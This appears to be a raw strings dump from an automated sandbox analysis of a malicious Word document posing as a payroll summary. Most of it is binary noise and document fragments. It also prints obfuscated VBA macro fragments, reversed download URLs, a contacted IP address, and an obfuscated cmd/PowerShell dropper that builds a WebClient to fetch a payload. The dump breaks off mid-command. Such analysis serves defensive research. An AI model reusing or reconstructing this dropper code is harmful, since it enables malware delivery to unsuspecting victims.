ZzPpc(qbuAGRiOkz3"UGpst"208)D`CIojF213Ek/20* uLQzMH650qHzicI"jhBfQCmpIFncFj6Qovrp(Irr/ TfBFz@1{bCRKN2!I6@YFhYNH4511#CFfz0cAp46549,MXzLm6m006hfw`~dhCPv1qaBbOc!"i.%@SH5i V/%^c^_", 80769c'220TaWwUWFOCMD!LBCoa=(zsOjpFBRjpV3969}sZpn04bQvMij`38fAamk@ * LnI8iUV7FMIiTM}XSdYA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data
(cmnmspthrd.exe
)
{k6IP6$5P:dG u
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
{rscbauCGkl*)YuYiiYbSDWYYfpOKfL*ZbCzDTwBKLzKLcwkpEUTiwkAuGNaWcULmXfQ LYkPzDjboTkEkkwEvR<QszoVQnzRZa++uzjmz9TSuqRPQqSkzGvCbcmYtdBJzVpnPzOwzZCShellVzEBYNtChrK~vbKeyCzpawOOEKKizpwhStunbAmlJwGiXlAjVEiAHa3LInkzH"PmHiZm
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
{W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
|*.bmp;*.cur;*.dib;*.emf;*.ico;*.wmf|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
}!1AQa"q2#BR$3br
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
}k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
~!2g/<+u;2j76qg?_\y]^UvEaC/cod2^gltS-QTfQEQEQEQEQEQEQEQEQEQEQEQEQEQE?q?qfAW|'S5uyyo>;r=&(>++"?S^^[AGS<(?BqF [OW_DhtE{9F>c>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
~0g0n0peW[
Ansi based on PCAP Processing
(network.pcap)
~0g0n0tepe
Ansi based on PCAP Processing
(network.pcap)
~d"90exp<^!~J7t Lc\)Ic8E&]Sf~@Aw?'r3&2@7k}naWJ}N1XGVh`L%Z`=`VKb*X=z%"sI<&n|.qc:?7/N<Z*`]u-]e|a|mH{m3C.nAr)[;-$$`:>NVl%kv:Ns_OuCX=mO4m'sd|0n;pt2e}:zOrgI(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
~JTe\O*tHGHY}KNP*T9/#A7qZ$*c?qUnwN%Oi4=3N)cbJ
Ansi based on Dropped File
(~WRD0000.tmp)
���/����
Ansi based on Runtime Data
(cmnmspthrd.exe
)
����?���������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�����
Ansi based on Runtime Data
(WINWORD.EXE
)
������
Ansi based on Runtime Data
(WINWORD.EXE
)
�������
Ansi based on Runtime Data
(powershell.exe
)
��������
Ansi based on Runtime Data
(WINWORD.EXE
)
��������?�����������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
���������
Ansi based on Runtime Data
(powershell.exe
)
����������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
������������
Ansi based on Runtime Data
(powershell.exe
)
�������������
Ansi based on Runtime Data
(WINWORD.EXE
)
�������������/���/��
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�������������/���/���
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�������������/����������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
��������������
Ansi based on Runtime Data
(powershell.exe
)
����������������
Ansi based on Runtime Data
(WINWORD.EXE
)
�����������������
Ansi based on Runtime Data
(WINWORD.EXE
)
��������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
������������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������
Ansi based on Runtime Data
(powershell.exe
)
����������������������������
Ansi based on Runtime Data
(powershell.exe
)
������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
�����������������������������������������������������������?����������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?��������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
��������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
��������������������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
���������������������������������������������������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������������������������������������������������������������������
Ansi based on Runtime Data
(cmnmspthrd.exe
)
!"#$%&'()*+,-./012345689:;<=>?@ADEFa *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal2\(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library?\&4zTZADLcFXJtFRE0<5cd8073f)zTZADLcFXJtFREt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!AHHCZ%75156iVwuE625@M* HIJmM6312zUhUQ OGXWPwVurLGdno@dar11%bHY@KFlwode@sXYf%522p9395`b, E
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"' & (= *( ,[XX .! 0T-X 2 4X'$
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"/e5[s`Z'WfPt~f}kA'0z|>|Uw{@tAm'`4T2j
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
#-q8|.[Ck4*j)jnc"ePG7;.h
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$' ' ! < XX X X' ' ? ` VXX L BX X'7I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- )mU9}'+'}'+'mU9+mU9{hCkBBB0B$'.C ' +X P XX }8X X'C++- ' ` Z XX V .X X'ata.,jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ$' ' Ii % beXX m "X X' ' u !rXX 3X
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$'8 <': @ B> D F/XX Hf~ Jq*X L NX'>mU R'P V XaM Zhz \$XX ^z% `X b dX'TRfjE8^p^S^m^o^c^% 8D$'f j'h n p r|f tXX v xT#X z |X'l' '~ F8 XX z1X X'Rcs.AbRp c/ k.l.l.l.l$' ' - MXX a 6X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$.' ",#(7),01444'9=82<.342C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' W XX i "X X' ' $ &E ( *XX ,| .}X 0 2X'"{ "N" KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi$'4 : 0 8'6 < >( @ B<nXX Dy FX H JX':"V" N'L R TB Vq XjXX Z^| \WX ^ `X'Pd.Oa d" f'btr j'h n p" r tXX v@ xyX z |X'lEnable ~ b | T 4 N & : h'V" : ' M# =XX eX X'i ' w M UXX X X'icro ' M j ^XX s X X'7:44:5oAttribute VB_Name = "FPAOsHRZpzGcVH"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' J $XX # $X X' Z18aIlstes&&eh=%fXnREwXL,$'" &'$ * ,Z . 0yXX 2~ 4X 6 8X'(' <': @ B\ D FC%XX Hx J=pX L NX'>lDlPGtes&&GwBRPlJz=%mKF[[[[$'PmU T'R X Z1 \ ^UHXX `z< bOX d fX'V j'h n p r8 tXX v xf{X z |X'l12Ces&&s=%NoUfYsKZ7J===
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'/U-0y.6=}+zk"h<E7XRk}C:V
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'2 2XX ) X X'Xt.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZKKKRK$' ' 5 XX X X' ' + 5 eXX bq X X's.EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada...m.$'{ ' ` 9 DXX nX X'' ' G 8XX i X X'Hw0mU9;)CDSAxmU9+m'+'U91 ,mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv&t&t&tB&t$' ' Y XX g&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'theme/theme/_rels/themeManager.xml.relsM
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'theme/theme/_rels/themeManager.xml.relsPK]
Ansi based on Dropped File
(~WRD0000.tmp)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((j666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Dropped File
(~WRD0003.tmp)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((j666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ OJPJQJ_HmHnHsHtHN`NNormaldCJ_HaJmHnHsHtHDA D
Ansi based on Dropped File
(~WRD0000.tmp)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((w666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@6666 OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(*.exe)|*.exe|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(*.ico;*.cur)|*.ico;*.cur|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(08Normal.dotm1Microsoft Office Word@@W@WRyfewuja84323Ryfewujasho58022Ryfewujashowavae46504.+,0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(;:ujM,"d?%zWSjWzuciny1UBXm?l?e7V2FwNR\xGV9&]SCx
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(`/(A`/n__SRP_32MizosJmiCc=uIpNwjvi8
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(sKEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQER>PEPEPEPEPEPEPH$QXztm+uzQ,}WM.`_9zT&waN#&$/#(%v5shYExj:&fGGN{8v)~_q5I|BUFS?g
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(X X'$ ' - f> BXX < a?X " $X'cewCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W$'&7:04 *'( . 0+@ 2P 4XX 6Xl 8gX : <X',ta.Fir @'> D F HB JXX LZ NCX P RX'B5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uCeeee$'T X'V \ ^t `Zl bXX d f:X h jX'Z n'l r t8B v xjKXX zd | X ~ X'p8WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(|3Oj>!M:b=7G\U%]TrjnZ\w?
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
*w ,v-XX .@ 0VX 2 4X'$OwJQO+wFc.l&%tttt$'6YY :'8 > @1 Bx D[XX F H-X J LX'<m P'N T V X ZEXX \ ^3X ` bX'RkBSvYhmXnjzGDhFf% te,wdP$'d' h'f l ne pJq r)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+51[%YdQUZA<97790<lTKPrE<98612eKqiiO<iWGoYC@<@MrTCkW$GinD(UVKPS!DoiZdMAuHKf)1A2FFtAIi"41232a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+INKkD\ox~k#nmnf-H@:z75>g\OuXG6h4t
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
,(jcAV rx91v9uOceUlC~U9upmU9+Q0:vne8A8x1 = '+'CDSAx 1;)JQ(O@JQO(ti
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!0C)theme/theme/theme1.xmlPK-!
Ansi based on Dropped File
(~WRD0000.tmp)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!g theme/theme/theme1.xmlPK-!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
-_--_-----_t__-___
Ansi based on Image Processing
(screen_0.png)
-GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
/n "C:\09172 Payroll Summary.doc"
Ansi based on Process Commandline
(WINWORD.EXE)
/O % 4XX \B @X X' ' "wM $& &.XX (= *X , .X'6Kt%bHYKFlwokA4$'0 4'2 8 : < >XX @? BX D FX'6
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0046}#2.0#0#%WINDIR%\system32\e2.tlb#OLE Automation`ENormalENCrmaQF *,\C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0zc$sk4/|)}i:i:WGrv=qSeO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
168wU]PXI - CStr(61279) / SNjdC8CLng(XdnfXI)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
1yL-[DR?%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE16\MSO.DLLOffice
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2FhsF+Y\n:3E[69`&45Z!*5k8`Fmw-"d>zn"ZxJZp;{/<P;,)''KQk5qpN8KGbe
Ansi based on Dropped File
(~WRD0000.tmp)
2mA!OfficgODficg!G{2DF8D04C-5BFA-101B-BDE5gAAe42ggram Files\@CommonMicrosoft Shared\OFFICE16\MSO.DLL#M 16.0 Ob Library%z4@zTZADLcFXJtFREGTZ@ADL@7FXJnFREP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2RvIPSNiRHXmaMztiX! jUMV}(CmDiI1uViT,9784A3`hUdPw!1AFLiVlfz653292QirQR?32509#vOdPSj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4<MX/OZ2H!cD 7IC9ExC9EMX/OZ2H!cME(S"SS"6"(1Normal.ThisDocument0(%`%(%*`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4aWW000X000X0rU@(`/(A`/(`/$`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6&&IEGv;FO\4-Sra)RmNAlK[D!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6'gpc_48.gRLB@lr++cxg]u{[+-JG_#G*>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6XX -M X X'e. "' & ( *o% ,VXX . 0X 2 4X'$oX <': @ B D F;XX Hv J,X L NX'>ta.DuroH@nAttribute VB_Name = "zTZADLcFXJt@FRE"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7 XXX n> X X'bkR,mU9+mU9/mU9+mU9/:pttmU9+G.3333$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7-A?>iO6~{v5-89F.<G8#5NbpUckE @9E((((((((((((((((((((=x>Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@((((JXip/lg;>116*O+v
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
77107$LnzlWW44716 * QzfNYh6Str(@79242)[R0iTzT>NaPLIcEnd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7872#ojjoBw!o8208$WzsjO7673XiPcIAlBslONhiDbVW0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7_?m-{UBw<w_$#[8{(/$0hF{L)#7i%=A:s$),Qg20ppf
Ansi based on Dropped File
(~WRD0000.tmp)
7w2m@s^{4}X6pR9$fOK$l%n8'Pk'f>i..yi%`-IQcO0zg!ej
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
81.21.67.85
Ansi based on PCAP Processing
(PCAP)
: :$:(:`:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
:<:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
; =d%T,om3h-6JN.Oh-@6F4RPvEJ6( k*Ak*Mm.>PkTICv27Y}2t"!Za@-(SQEQ$R$C\
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
;-._,-._,-.
Ansi based on Image Processing
(screen_0.png)
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Dropped File
(~WRD0000.tmp)
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>L#@0(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
<i#fKS4(}M:N\W`mR\iX%}Iut0=k>kJ#Tf_dZ/RNXFIVnu Cij(&Kh4nB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
>VYUb;bjbjGG.%d%d+++++????K?WWWWWFFF]]]]]]$<!*+FFFFF++WWZZZF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
?\&$*\Rffff*0<5cd8073f4&"bx"bdh`p"bPfX"bH`dh"bPfXd0"8@bH 0'. 4 6Wt 8% :MXX < >~X @ BX'2lato J'H N Pl RFw T)XX V XX Z \X'Ltu `'^ d fF ho jyFXX lp nY-X p rX'b v't z |y ~ XX G EvX X'xo(X ' .8 0XX +y |X X'58.72 ' R l
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@$y>U1I>+3BF"*)XwvTMNr+m\kaTJzR@E!csI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@Aq-QEQER sih((ByREPEP$2r}h
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@aUPkBz(YhkAPVUiVu1A6(@YjTvzp68463E(nTVot(83577AWfWli94338(LCdzbME(77145A(ztozYAtA(TmLOA@(N OLVSL@$wzIizt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@N!Y]i-TnRB8zmmwSRtO"i32<`3xSP]"M9;
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@ocHjsC(iiJIQLqEdjX96136A$qpbDn199cqMofSdj@29py3BBZZCr|@* zfvbLFAPt90AAoKuzmqEsQSpi0DvLwDD@sGPRq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@tthqwZP(0zrpCwjjo19429UniJsp9AR QTncH72819BGJQU92JVHXWtJ27441rzocPOP@ljSHaW@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EE2989979980][O00000000]*C:\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EE2989979980][O00000000]*C:\09172 Payroll Summary.doc
Unicode based on Runtime Data
(WINWORD.EXE
)
[Host Extender Info]
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\>XX ^ `X b dX'T h'f l nEP pO r1XX t{ v9X x zX'jY0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2,UUUU$'| '~ P r<XX fJ /$X X' ' Q '~ oXX MSX X'PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+mlOOOO$' ' m t BVXX PX X' ' k 'w |XX QT X X'=eiEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEpQQQ^Q$' ' Z i |QXX L eX X' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\Z8WRxY5xkX{o,AqI'J(>}JK|G}$obDp] d`soLuYm\U+qer:>V%rc8m_WOJ}K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
^smkq<'ldZme5tSG8Pm#|:~^[,ka&&f5{7VR"4[v`v`1-=]Dx#eDj>ND.Y7|Fs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
__::_::__
Ansi based on Image Processing
(screen_5.png)
_uiRM.Y<VaW8m>W7./\Vh$5vy"dP,YOw:DZV.b9
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(powershell.exe
)
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
A5g@uh3>3-;:]*
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AIjza(hWYZq / @HNCjjs18890Fix(zwQqFr)) + 83688 - CLng(nabaH 70764#qvNnq33935 * ZPvSI3Str(55930)XmtpiU<BrsrBiEnd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
aQDWOjHWkzQXuDUL 31391@tludbP850fGRmvrv!F=6121Qoaul+ 550$P! RSmEzg!73pzuaNpauwXrqk!00IIDrcPuRTRQp5+ KpLRiDHzwV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
aVJlBH=RSDLAu lUWWW@#55496=BGz$EF=17=GDiaLQ=0=@zfRIRO58867=pswSvF>9044=TvELU@= FjLQLmXFSlm jAhYO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AVvICC3WIMY1O8zkJLXU`,6BOAYbQJCWzGdlsRXULw! ABpjOujd(zpuhn/ XDAQD@66571& zcovn"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
B,$"B+B'FPAOsHRZ@pzGcVH'FDP@'Os@RA@*pzG@*V?'K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Bp9fsc-QEQEQEQEQEQEQE I-PEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPE;PEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEr9#((Is
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
C_DhtE|q> [OWo#8/E(W[itrFWxc_1d~;s^%n.q}Eqc0T#M-^tOz}=
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
CcDLj(ICMTmKzCVKBT!c6689zjOidb491 alwSBl320hDFQDjz802"HPNrcQ8 P3PUHzD $@ojFaqQ C GiBof@scSSG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cjbo-wJE@@EnJQE&FbdsmU@a0dasn@(( '( )'x'+]03[em ohS2,@878545B>, 1178<wvuWHkThnA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cjjUC_KAfMvWNidAmVGFcUKAAuwdGsXoRuJuYtjjCbNlEvXzLYTFYPEGCHwYe5qrIPhiizVPKjCzFYoFppMbU;xcdvcMS7}uMmHSRM_tWjIFU3EBajL$CvoMrCsCrE*-KzGXic=DWAhYtCdGR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um 